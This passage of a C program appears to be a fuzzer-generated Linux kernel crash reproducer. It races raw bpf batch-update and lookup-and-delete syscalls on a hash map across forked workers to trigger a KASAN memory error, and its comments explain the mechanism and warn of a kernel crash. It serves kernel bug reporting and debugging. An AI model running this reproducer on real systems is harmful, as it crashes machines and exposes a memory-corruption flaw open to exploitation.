0\x56\xa1\xf6\x40\x2a\x5e\xb0\xc6\x52\x3c\x3c\x66\x9b\x1f\x24\x64\xac\x78\xe3\xb2\x6d\xa8\x55\xdf\x15\x4d\x9b\x34\x16\x44\x93\x78\x5c\x86\x8f\xcb\x75\x85\x6e\x6b\x9d\x46\x0e\xd1\x4b\xe1\xc7\xb0\x3a\xcb\xa3\x6a\xf0\xc4\x10\xc5\x0c\x8b\xfd\x69\xa8\x21\x5e\xa5\x50\x7b\x3d\x1d\x6d\x20\xcc\x54\xb5\x3a\xf1\x17\xa1\xaa\x0a\xeb\xc2\x58\x11\x55\x6b\x61\xa1\x23\xbb\xa8\x38\x82\x56\x56\x74\x83\x14\x6a\x87\x48\xd8\x4d\xeb\x07\xd1\xa0\x04\xbd\x9c\xfe\xd3\xdf\x8e\x8b\x81\xa8\xca\x1d\x8f\x43\x48\x0d\x21\xae\xfe\x1e\x79\xdf\x20\x6a\x36\x2e\x3f\xb2\xa7\xe0\x03\x94\x9a\x83\xa8\x0e\x72\xa6\xde\x32\x4e\x9f\xef\xfe\x43\x3a\x50\x7d\x3a\x5d\x69\xe2\xe9\x0c\xca\xe6\x60\x65\x25\xd2\xcb\x55\x1b\x05\xb5\x84\x35\x9c\x7e\xe3\xe4\xb5\xc8\x9c\x21\x22\x9a\xba\x27\x82\x49\x76\x39\x0e\xe1\x5f\x2e\x8b\x7c\xfb\x6f\xc9\xad\x60\x1a\x1b\x79\xf0\xa6\x42\xc3\xd4\x8d\xf2\xde\xaf\x47\x5b\x22\x08\x67\xbd\x6a\x0a\xe6\x39\x03\x21\x5f\xfa\xe1\x66\x2e\x72\x79\x7d\xf6\x74\x25\xcb\xa4\xd8\x95\x92\x9f\x72\x96\
x21\xa9\x64\x0b\xe7\x73\x22\xc6\x1f\xa8\x5c\xf8\x0b\x13\xb1\xfb\xcc\xbc\xdc\x17\xfa\xc3\x2b\xe3\x69\xb2\x26\x92\x33\x56\x71\x55\xec\x0e\xdd\xfa\x5e\xcf\x94\xfa\x36\x3d\x5c\xb3\x63\xb9\xfb\x3a\x0d\xe6\xc1\xa0\xcf\xb0\x5f\xa1\xa2\xe9\x4b\x8c\xd9\x21\xa2\x8b\x8a\x7b\x09\x75\x47\xa1\x07\xa3\x4e\xa3\xc5\x9e\xde\x91\xa5\xae\x37\x88\x06\x38\x2b\x0f\xb7\xd2\xcd\xc4\x04\xbc\x9f\x62\x5b\xce\xb8\xe7\xc2\x16\x34\x48\xf7\xb6\xbf\x95\x0a\x1b\x50\xd8\xdb\x27\x6f\xd2\x65\xf4\xce\xf1\x4c\x71\x95\x5e\x9c\x6b\xfb\xbd\x15\xb0\x91\xae\x03\x6e\x20\x20\x4d\xb4\x62\x2e\x3d\x9d\xea\x2b\x2f\x57\x5a\x9d\xbf\xe0\x0f\x24\x77\x89\x0a\x28\xca\xf3\x0e\x03\x48\x8c\x5d\xad\x83\x3a\x64\x80\x36\x07\x7e\xf6\x28\xcf\x6d\x21\xca\x26\xfa\x6d\x68\xd3\x87\x21\x4c\xdd\xa6\xce\xac\xd5\x6e\x62\x42\x37\xad\xbe\x3f\x76\x9a\xdd\xde\x2c\x22\x88\x24\x99\xb5\x17\x96\x91\x8e\xea\xd3\x8f\x7f\x35\x7e\xff\xe6\x86\xc9\xab\x4b\xdd\xa4\x68\x95\xfb\xef\xaf\xbe\x6b\x66\x99\x0b\x02\xd1\x15\x3d\x43\x4b\x03\xfa\x3c\x6f\xd0\xcf\x03\x4b\x53\x94\x75\x65\x53\xbe\x29\x5d\xf8\x0e\x17\xd6\x1a\x94\xf9\x5e\xd5\x7a\xbb\xad\xf6\xf8\x55\x43\xbc\x58\x78\x3e\xd5\x67\x8b\x30\x19\x3d\xdf\x4c\xca\x8d\x82\xb7\x63\x92\x0c\x08\xc8\xdb\x88\x31\xc5\xb7\x5d\x14\x8f\xa6\x09\xf5\x49\x41\x6b\xbc\x4c\x3d\xf8\x4c\xef\x4d\x44\x0d\xcd\x4f\xba\x57\x68\x38\x55\xfe\x54\x78\xff\xa8\x92\x29\xfd\xa6\x87\xfa\xc0\x43\x5f\x3f\x9b\x99\x94\x75\x3e\xaa\xb6\xdf\x32\x7a\xeb\xf6\x5e\x8f\x6b\xdc\x94\xdf\x93\x9c\x11\xfc\xfd\xc9\xc8\x1a\xa5\x13\x40\x58\x9b\xf8\x17\x98\x89\x68\x70\x84\x5d\x52\xde\xba\x6e\xc7\xc8\xbb\x8e\x95\x17\x27\x44\x0a\x1c\x8c\x81\x87\xd9\xf2\x14\xc8\x82\x4c\xe0\x26\x16\x1c\x6e\x0b\x67\x2e\x1e\x00\x43\xf6\xed\xd8\xb6\xce\x99\x48\x1f\xae\x85\xed\x9a\x21\xe0\x32\x2c\x87\x70\x43\x89\x41\x65\xfa\x7d\x79\xd7\xf0\x9f\x72\x4e\xa8\x29\x00\x14\x92\xc5\x33\x20\x91\x5b\x0e\x8c\x8e\x2f\x5a\xce\x34\xfd\x42\x30\xe9\xd8\xea\x8a\x0f\xfb\xaa\x47\x48\x3a\xe1\x9b\xc8\x21\x5c\x03\x27\x40\x99\x3e\x5b\xab\x79\x17\xd7\x8d\x57\x2c\xfe\x04\x00\xa9\xcb\xb6\x13\xd3\xa8\x47\xa3\xcf\
xb2\x53\x06\xea\x41\x19\x75\x78\xf4\x70\x91\xeb\xf2\xf9\x7f\xaa\x21\x4c\x3e\xa9\xbc\x76\x5e\x72\x1e\xa5\x89\xc3\x1d\xe1\xe3\x2b\x36\x99\xae\xe2\x0a\x17\x3a\x90\xdb\xad\x1d\xdf\xdd\x7b\x12\xf9\xfc\xe9\xd4\xa6\x52\x4b\xc1\xac\xf9\x19\xfe\xb2\xd2\x5b\xb9\x68\xe2\xf6\x02\x21\x6b\xf9\x20\xe8\x1d\x99\xe8\xa4\x91\x9d\x8d\xc4\xb3\xfa\x63\x57\xd5\x87\x48\x2e\x2c\x49\x9c\xbd\x96\xab\xcf\x7b\x4a\xed\x25\x74\x37\x01\x93\x39\x26\x6c\x56\x64\x08\xa4\xa7\x81\x08\x97\x05\xca\x5e\x3b\x2b\x86\xff\xa7\x5a\x5b\x28\xb8\xab\xd9\x57\xc8\xf4\x66\xaf\xef\x5a\x4d\xfb\x84\x96\x44\xa9\xd5\x12\xf6\x59\xfd\x6b\xbb\x9a\xae\x92\x1e\x28\xc3\x03\xc9\x75\x56\xb7\xf7\xf5\x69\xbd\x2f\x6b\xd3\x65\xcb\x36\x6a\x0d\xd7\x5c\x2f\x8b\x63\x0f\x13\x0a\x7d\xc2\xc6\xe2\xd4\x7e\x7d\x64\x05\x22\x4e\x57\xd9\x95\xa4\x6c\xef\xa5\x36\xe9\x26\xd2\x9f\x58\xf9\x4d\xbc\x93\xad\x20\xe7\x55\x31\xe4\xb3\x44\x51\xec\x6e\xed\xa2\xf2\xf7\x50\xdd\x7d\xdb\xa0\xef\x2d\xd0\x68\x3d\xed\xff\x89\x7b\x38\x13\x69\xcb\x68\x96\xef\x43\xca\x05\xbe\x47\x2f\x57\x97\xf3\xdc\x1a\x8c\x89\x3b\x4e\x16\x61\x55\xc9\xf7\x0e\xad\x13\x42\x70\x80\x2b\x82\x08\x50\xe9\x5b\x84\xe0\x6a\xe8\xe3\x9a\xbe\x96\x8c\x58\x5b\xcc\x07\xcc\x6d\x2a\xe5\x77\x69\x4c\xcd\xd4\x60\xdc\x37\x81\x5c\x58\x7e\x09\x14\xc6\xd1\x6b\x2e\xb0\xef\xa8\x71\x3f\xab\xca\xb1\x0b\x92\x2e\x7a\xe9\xba\x2d\x1c\xf7\x0d\x89\x9e\x82\x94\xae\xc2\x0b\x78\xd4\x48\x90\x0d\x24\x3d\x0e\x5e\x2b\x68\x9c\xe2\xe1\x01\x6e\x5d\xc8\xff\x4d\xf7\xcc\x3b\xda\x06\x57\x8a\x41\xab\xd5\x6d\xc5\x64\x75\xa8\xc2\x9f\x2f\xe5\xf8\x8b\x8e\x69\x29\xaf\xdc\x46\x79\x0e\x0c\x39\xb0\x42\xaa\xaa\x05\xb9\x08\xb6\x0b\xed\x67\x30\x80\x87\x61\x88\x8e\xac\xc3\xc3\x7f\x01\x57\xf0\xce\xd8\xaf\x66\x22\x4f\xee\xa5\xed\xb9\x00\xa7\x7c\xe1\xd8\x7f\x2b\x3b\x1f\x73\xaa\x30\xf7\x9d\xfc\xe6\x2d\x11\x5a\x60\x8b\x7a\xc9\x4d\x73\xf5\xc4\x00\xa2\xba\xc9\xe9\xb0\x3c\xb2\xd9\x33\x0e\xe9\x41\x9a\x01\xe2\xf4\xeb\x91\xa1\x36\xb7\xc0\xdc\xfc\x67\x2b\x3b\x50\x10\xe5\x46\xfc\x1e\xa5\x45\xa8\x10\x9e\x21\x0c\x19\xa8\xfc\x82\xb9\x1a\x3c\x5a\xf9\x0a\x5c\x28\
xc9\x1f\xe5\x30\xc0\x3a\xe0\xaf\x91\x55\x82\x75\x32\x96\xb5\xf0\x87\xc0\xf3\x96\xfd\xfd\xf1\xe0\x12\x8a\xa0\x79\x23\x5c\x2f\x48\x8e\xdc\x39\x3b\x98\xee\x79\x3d\xed\xfa\x03\x72\xa7\xc2\x37\x03\xad\xe1\x7e\x7b\xa8\xcd\xde\x28\xe7\x67\xe7\x5a\x36\x26\x3c\x5f\xe2\xba\x99\x36\xa5\xbe\xeb\xec\x32\x2c\xa3\xa0\xb8\xea\xaf\x8e\xf2\xc8\x32\xd8\x30\x41\xb0\x9b\x57\x44\xc8\xe2\x1f\x86\xa7\xe7\xbe\x2d\xc6\xc2\xc3\x9c\x71\x2a\xdb\x52\x91\xbd\xcc\xda\x32\xd1\x26\x9a\xb5\x03\xce\xbd\x53\x8f\xdc\x61\xac\x90\xaa\x06\xa9\x09\x6e\x2b\xad\xf9\xac\xe1\x4d\x5e\x8c\xb9\x99\xfb\xfe\x23\x8b\xcd\xb7\x6a\x76\xd3\x39\xab\x49\x06\x2a\xef\x40\x76\xf8\xe1\xdf\x03\x8e\x6b\x57\xff\xd2\x07\x69\xde\x49\x21\x99\x63\x7e\x64\xaa\xf9\xa5\xe4\xab\x9d\x9b\x3f\x95\x60\x76\x3d\x2a\xd6\x49\x52\xfd\xc3\x40\x48\xd6\xa9\x2a\x75\x3d\xc2\xe7\xee\xef\xf5\x1d\x1c\x11\x34\xe7\xc1\x4b\x80\xcd\xe2\xdf\xd1\xf1\x1a\x77\xcd\x98\xa7\x84\x27\x25\xdb\xc2\xb1\x80\x8e\x6a\x11\xf9\x45\xda\x39\xbc\xe0\xf8\x50\x25\x12\x0e\xd7\x81\xfd\x70\xe5\x26\x23\xdb\x9f\xfa\x89\x60\xdf\x56\xa2\xbd\x4a\xcf\x1d\x72\x71\xd9\x71\x12\x31\xc4\xb6\x3a\xc7\xfc\x2f\xea\x1c\x9a\xce\x11\x3c\xdf\x1d\xb9\x92\x88\x3d\x14\x77\xb6\x6a\x95\x72\x14\x62\x03\x13\x2e\x69\x63\x35\x1e\x90\x4b\xd4\x7f\x77\x03\x0c\xda\xf0\xe7\xc6\xf9\x81\xa7\x23\x5a\xfd\xf4\x1c\xb7\xf2\x32\x6b\xe9\x95\x6f\xd1\x1f\x37\x44\x65\x35\xd7\x16\x69\x30\x4b\xf8\x87\x36\x2f\x3a\x24\xff\x9c\xf7\x0b\x36\xa8\x2e\x79\x94\xb0\x0f\x61\x2f\xc8\x35\x8d\xb6\xe4\xcd\x03\x31\x36\xe7\xfc\xb1\xb5\x3b\x73\xd6\x06\x0c\xf2\x55\x5e\x5a\xe1\xa6\x27\x5f\x13\x3c\x0f\x7d\x50\xc1\x65\x49\xac\xea\xa8\x68\x78\xfe\xd5\xeb\x21\x73\xbb\xf8\x82\x59\x88\x19\xcf\xbb\xe4\x37\xa2\x10\xc4\xf4\xf6\xfc\x68\x5a\x1f\x45\x79\x57\x13\xb8\x35\x82\x6f\xf0\xe1\x9b\x0c\x20\x85\x78\xe1\x9d\x54\x9b\x17\xa0\x54\x9a\x6d\xab\x0e\x71\xcf\x37\xb4\x42\xd7\x06\x38\x22\x77\x61\xe4\x9b\xf2\xd6\x97\x49\xca\xfe\x1b\x4f\x2e\x33\x6b\x20\x13\x2f\xad\x52\x64\x9e\xe0\xbc\x41\x19\xdf\x4c\xd9\xea\xf6\x91\xbb\x17\x6b\x29\x84\x06\x49\xea\x2f\xd2\x2b\x94\xcb\
x68\x8b\x7b\xd2\x42\x7a\xcd\x3c\xc2\x4a\x8c\xbb\x14\xa5\x14\x65\xc8\x4f\xd6\x1f\x4b\x49\x72\xca\x45\xe7\x42\x60\x87\xd3\x83\x96\xca\xfa\x59\x91\xe5\x84\xa1\x09\xcf\xc1\x9c\x68\xd9\x56\x90\x76\x97\x64\x1b\x85\x32\xa3\x1e\x5b\x4c\x51\x27\xc4\xb4\x69\x43\xc8\x80\xfd\xa3\x9d\x14\x11\x5d\x4f\xc6\xc0\xc6\x03\x94\x5b\x73\x6a\x38\x15\x41\xf8\xac\x40\x7d\xc6\xc8\x9f\xa5\x05\xbb\xd8\xfe\x4c\x14\xe5\x18\x29\xeb\x5c\x92\x3d\x70\x92\x00\xe0\x88\x15\x7c\xb8\xc2\x16\xde\xcb\x79\x81\x11\x2a\xa2\xeb\x99\xb6\x3a\x88\x47\x0d\x5f\x21\xa8\x48\x17\x56\x5e\xf0\x60\x61\x7e\x75\xd9\xea\xf1\xd3\x61\x50\x43\xfa\xec\x58\xd0\x01\xa4\xde\x2b\x0d\xf5\xbb\x8a\x25\x1d\xa0\x8e\x30\x14\xd1\x03\x9f\x9f\x3a\x34\xce\xdb\x0d\xf2\x9e\x41\x45\x75\x4c\xfb\x5f\x85\xf0\x8d\xbf\x53\xe7\xbe\x2e\x40\x8a\x61\xf6\x14\xaf\x57\x80\x18\xa2\xf5\x98\xc9\x5a\x3a\xe7\x48\x3c\x7d\x0e\x7e\x77\x6a\x32\x12\x66\x48\xde\xdf\x98\x69\xed\xb7\x11\x94\x59\xc7\xfe\xd8\x0d\x75\x45\xf9\x7f\xa1\xb8\xf5\xac\x14\xfb\x10\x81\xca\xac\xcc\xc8\xa9\x50\x88\x29\xad\x73\xac\x90\xb3\x85\x85\x33\xfd\xbc\xab\x58\xe1\x21\x65\xe6\x4d\x78\x9a\x2a\x2a\x67\xd2\xd1\x6a\xc5\xf3\xdb\xde\x4b\xa0\x6c\x44\x32\xa0\xc0\x42\xaf\xa4\x5e\xaf\x4c\x5d\x75\x1f\xbb\x1c\x42\xab\x83\xa9\x5e\x7c\xae\x0b\x07\xbd\x40\x80\xd4\x79\xbf\x26\xe0\xf5\x84\x29\x24\xd7\x5d\x58\x76\x35\x0c\x9f\xa9\x71\xb6\x03\xd1\x79\x4c\x9f\x77\x1a\xc3\x57\xea\x0f\x9d\xe3\xef\x4a\x1a\x2f\xbf\x11\xec\x16\xa2\x32\xf4\x68\xa8\xfa\x67\x1b\x87\xdf\x78\x50\x28\x7f\xfc\xa7\x78\x23\xce\x69\x86\x56\xf1\x9a\xfd\x8d\x56\xf4\xaa\x59\xfc\x0f\x73\x32\x17\x86\xd4\x52\xbe\xe9\x33\x13\x99\x68\xb6\x63\x4f\x20\xcf\xfa\x5b\x6f\x62\x34\xd7\xb2\x7b\x8b\x7c\x81\xac\x35\xfd\xed\xdc\xf7\xcb\xc4\x49\x17\x3d\x7b\x94\x7c\x2a\xfe\x98\xfa\xe2\xff\x28\x26\x73\xbb\x8d\x71\xae\x68\x58\x37\x38\x77\xb5\xa3\x64\x19\xd4\x94\x28\xce\x7b\x69\x75\xe8\xf3\x6b\xbb\x98\xbb\x39\xe7\x97\xce\x90\x70\x52\x96\x83\xca\x93\x24\x84\x4a\xd8\xdc\x95\x7a\x10\x75\x5b\x1f\x42\x8a\x01\xd4\xd5\xc4\x14\xb9\x8d\xa7\xf2\x1c\xa8\xe6\x3d\x79\x77\xdd\x06\xb1\
xa6\x40\x86\x73\x1a\xe4\xa0\x14\x73\xee\x2f\x6d\x84\x2a\x51\x85\x91\x03\x6b\xb9\x15\x7d\x1f\xaa\xdb\x06\xaf\xf8\xfe\xdd\x47\xb5\xf2\x2d\xc7\xd1\x03\x01\xf2\x6d\xfd\x13\x0b\xc7\xbb\x6d\xe9\x0b\x19\x8d\x49\x89\x59\x12\x3b\x7b\xe7\xe3\x97\x48\xe7\xc7\xd5\x11\x31\xf8\x68\xf5\x53\x65\x0d\xa9\x9e\xf8\x8d\xb0\x19\x2b\x1a\xed\xed\xd2\x39\x18\xa0\xe2\x22\x0f\x63\x75\xfe\xc2\x54\xea\x32\x4d\x77\xc9\x2e\x77\xff\xed\x00", 4096);
*(uint64_t*)0x20000190 = 0x20001a00; /* value */
*(uint64_t*)0x20000198 = 4; /* flags (BPF_F_LOCK); irrelevant since the fd is bad */
syscall(__NR_bpf, 1ul, 0x20000180ul, 0x20ul);
break;
case 3:
/* union bpf_attr.batch for BPF_MAP_UPDATE_BATCH, 0x38 bytes. With count =
 * 0xffffffff the kernel presumably keeps reading key i at keys + 7*i and
 * value i at values + i*value_size until a copy faults (the PROT_NONE guard
 * page above the mapping) -- verify against generic_map_update_batch(). The
 * zero-filled mapping, the attr structs written above and the blob from
 * case 2 all become key material, far more distinct keys than max_entries,
 * so LRU eviction runs while this call is still in progress. */
*(uint64_t*)0x200001c0 = 0; /* in_batch */
*(uint64_t*)0x200001c8 = 0; /* out_batch */
*(uint64_t*)0x200001d0 = 0x200000c0; /* keys */
*(uint64_t*)0x200001d8 = 0x20000240; /* values */
*(uint32_t*)0x200001e0 = -1; /* count = 0xffffffff */
*(uint32_t*)0x200001e4 = r[0]; /* map_fd from case 0 */
*(uint64_t*)0x200001e8 = 0; /* elem_flags */
*(uint64_t*)0x200001f0 = 0; /* flags */
syscall(__NR_bpf, 0x1aul, 0x200001c0ul, 0x38ul);
break;
case 4:
/* union bpf_attr.batch for BPF_MAP_LOOKUP_AND_DELETE_BATCH, 0x38 bytes.
 * This is the call that reaches __htab_map_lookup_and_delete_batch() in the
 * KASAN trace; execute_one() only waits 50 ms per call, so it very likely
 * overlaps the still-running batch update from case 3. */
*(uint64_t*)0x20000680 = 0; /* in_batch */
*(uint64_t*)0x20000688 = 0; /* out_batch */
*(uint64_t*)0x20000690 = 0x20000340; /* keys (output) */
*(uint64_t*)0x20000698 = 0x200005c0; /* values (output) */
*(uint32_t*)0x200006a0 = 0xffff; /* count */
*(uint32_t*)0x200006a4 = r[0]; /* map_fd from case 0 */
*(uint64_t*)0x200006a8 = 0; /* elem_flags */
*(uint64_t*)0x200006b0 = 0; /* flags */
syscall(__NR_bpf, 0x19ul, 0x20000680ul, 0x38ul);
break;
}
}
/*
 * Entry point. Three fixed anonymous mappings are created with flags 0x32
 * (MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS): a PROT_NONE guard page just below
 * 0x20000000, the 16 MiB RWX (prot 7) data region that every hard-coded
 * pointer in execute_call() falls into, and a PROT_NONE guard page above it
 * (presumably what eventually makes the unbounded batch update in case 3
 * fault and stop). Five worker processes are then forked, each running loop()
 * forever; the parent merely sleeps. Expect a kernel crash -- run this only
 * inside a disposable VM.
 */
int main(void)
{
syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
for (procid = 0; procid < 5; procid++) {
if (fork() == 0) {
loop(); /* never returns */
}
}
sleep(1000000);
return 0;
}